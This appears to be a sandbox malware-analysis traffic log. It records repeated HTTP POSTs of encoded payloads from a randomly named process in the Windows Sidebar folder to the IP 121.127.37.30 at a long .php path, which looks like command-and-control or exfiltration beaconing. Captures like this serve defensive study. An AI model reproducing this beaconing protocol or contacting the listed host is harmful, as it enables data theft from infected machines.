                                                Dec 5, 2024 16:03:56.049139977 CET5001280192.168.2.7121.127.37.30
                                                Dec 5, 2024 16:03:56.049196959 CET5001180192.168.2.7121.127.37.30
                                                • 121.127.37.30
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.7 | 49724 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:20.243160963 CET | 470 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 344
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:21.555372000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:22.026050091 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:21 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 1364
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Dec 5, 2024 16:02:22.077785015 CET | 446 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 384
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:22.513395071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:22.893800020 CET | 324 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:22 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Content-Type: text/html; charset=UTF-8
                                                Dec 5, 2024 16:02:22.913639069 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:23.344397068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:23.876399040 CET | 324 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.7 | 49731 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:22.281012058 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:23.601726055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:23.840504885 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.7 | 49734 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:24.101886988 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:25.427012920 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:25.838675976 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:25 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.7 | 49740 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:26.093826056 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:27.412092924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:27.648539066 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:27 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.7 | 49746 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:27.959677935 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:28.315253973 CET | 2564 | OUT | Data Raw: 50 51 5f 5e 5e 59 51 58 5e 5e 51 57 50 5e 5a 50 59 50 58 41 5b 54 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQ_^^YQX^^QWP^ZPYPXA[TRX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)%0?1U"7;=8<+&(>36')W0+;8]&-!U*/!Y""Z)5


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.7 | 49752 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:28.999576092 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:29.346502066 CET | 1452 | OUT | Data Raw: 55 53 5a 58 5e 58 54 5d 5e 5e 51 57 50 5e 5a 59 59 52 58 49 5b 5e 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZX^XT]^^QWP^ZYYRXI[^RY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*?Y$,247;=]+6+= 6<?=23+(30+/!Y""Z)5
                                                Dec 5, 2024 16:02:30.325002909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:30.561918020 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 13 20 2d 0b 01 20 2a 27 53 2e 58 30 11 30 23 26 43 26 33 02 5a 31 5b 3d 57 27 2b 01 52 21 3b 37 18 35 3a 20 04 23 11 34 02 26 37 28 46 0c 1d 21 07 33 06 3a 0e 29 5f 2c 55 2c 2c 25 08 2a 20 29 02 2c 2e 0b 0d 29 55 29 1e 2b 39 07 09 25 28 02 59 33 29 32 16 2b 1d 01 11 30 1f 20 53 00 14 26 0a 3e 21 25 54 3e 59 3e 02 35 05 3c 50 2b 3b 0f 01 32 05 21 08 31 24 2f 5c 25 39 28 52 20 37 2b 57 2a 3e 0c 5a 25 2c 0e 5d 2a 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: - *'S.X00#&C&3Z1[=W'+R!;75: #4&7(F!3:)_,U,,%* ),.)U)+9%(Y3)2+0 S&>!%T>Y>5<P+;2!1$/\%9(R 7+W*>Z%,]*3&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.7 | 49753 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:29.139359951 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:29.487243891 CET | 2564 | OUT | Data Raw: 55 53 5a 52 5b 58 54 52 5e 5e 51 57 50 5c 5a 5b 59 52 58 42 5b 5f 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZR[XTR^^QWP\Z[YRXB[_RX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9),.'#$\>8X+%>;! (!<<;,\$-=V+/!Y""Z)=
                                                Dec 5, 2024 16:02:30.465775967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:30.700455904 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.7 | 49759 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:30.951083899 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:31.299603939 CET | 2564 | OUT | Data Raw: 55 55 5a 53 5e 5d 54 53 5e 5e 51 57 50 5e 5a 5e 59 53 58 48 5b 54 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZS^]TS^^QWP^Z^YSXH[TRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*2\$/ (^)?)*45;R(!?<8$Y'."?/!Y""Z)5
                                                Dec 5, 2024 16:02:32.275085926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:32.513256073 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:32 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.7 | 49760 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:32.760554075 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:33.112164974 CET | 2564 | OUT | Data Raw: 55 55 5a 5a 5e 58 54 5c 5e 5e 51 57 50 5d 5a 5d 59 54 58 47 5b 50 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZZ^XT\^^QWP]Z]YTXG[PR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X*,.'?* 4X)8Y?&?=_ !/,*0< 01U*/!Y""Z)
                                                Dec 5, 2024 16:02:34.085803032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:34.320471048 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:33 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.7 | 49766 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:34.559473038 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:34.909106016 CET | 2564 | OUT | Data Raw: 55 53 5f 5c 5e 5e 54 5d 5e 5e 51 57 50 5d 5a 58 59 56 58 42 5b 56 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: US_\^^T]^^QWP]ZXYVXB[VR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>>Y0?%#(=]#+5+*'6,=?X(8'1(!Y""Z)


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.7 | 49772 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:35.686146021 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1436
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:36.034172058 CET | 1436 | OUT | Data Raw: 55 53 5a 5a 5e 59 54 5e 5e 5e 51 57 50 5a 5a 5f 59 53 58 42 5b 53 52 5d 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZZ^YT^^^QWPZZ_YSXB[SR][\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>?2\3/W#4+=]/<'=9^ /7(24(8Y3-=?/!Y""Z)=
                                                Dec 5, 2024 16:02:37.014811993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:37.248414993 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:36 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 23 01 20 2d 04 59 34 5c 28 0a 2c 2e 28 10 24 20 2d 18 32 30 33 04 31 03 29 12 27 3b 2f 51 21 05 0e 05 35 07 05 58 23 59 34 03 26 37 28 46 0c 1d 22 58 33 3b 31 57 2a 39 24 51 2c 2f 3a 1b 29 1d 0c 13 2e 3d 31 08 3d 0a 21 1e 3c 17 2a 50 25 5e 30 5f 30 5c 31 06 2b 23 05 1c 33 35 20 53 00 14 26 09 2b 31 17 53 28 2c 3e 04 22 12 28 1f 28 38 22 5b 24 2b 25 0f 26 27 3b 5f 25 00 23 0d 34 0e 2f 12 29 3d 25 04 26 12 09 04 2a 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: # -Y4\(,.($ -2031)';/Q!5X#Y4&7(F"X3;1W*9$Q,/:).=1=!<*P%^0_0\1+#35 S&+1S(,>"((8"[$+%&';_%#4/)=%&*&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.7 | 49773 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:35.808840036 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:36.159135103 CET | 2564 | OUT | Data Raw: 50 56 5a 52 5e 5f 51 5e 5e 5e 51 57 50 58 5a 5c 59 5d 58 49 5b 53 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZR^_Q^^^QWPXZ\Y]XI[SRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9]>6\&? \=]/>&;)9<!7(! ?(&=%?!Y""Z)-
                                                Dec 5, 2024 16:02:37.134546995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:37.368572950 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:36 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                12 | 192.168.2.7 | 49779 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:02:37.605022907 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:37.955979109 CET | 2564 | OUT | Data Raw: 55 55 5a 5e 5e 58 54 5a 5e 5e 51 57 50 59 5a 58 59 56 58 40 5b 54 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZ^^XTZ^^QWPYZXYVX@[TRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y*.$/> '_+;'(%8+) "/W>3Y< '-(!Y""Z))
                                                Dec 5, 2024 16:02:38.925029039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:39.160757065 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:38 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
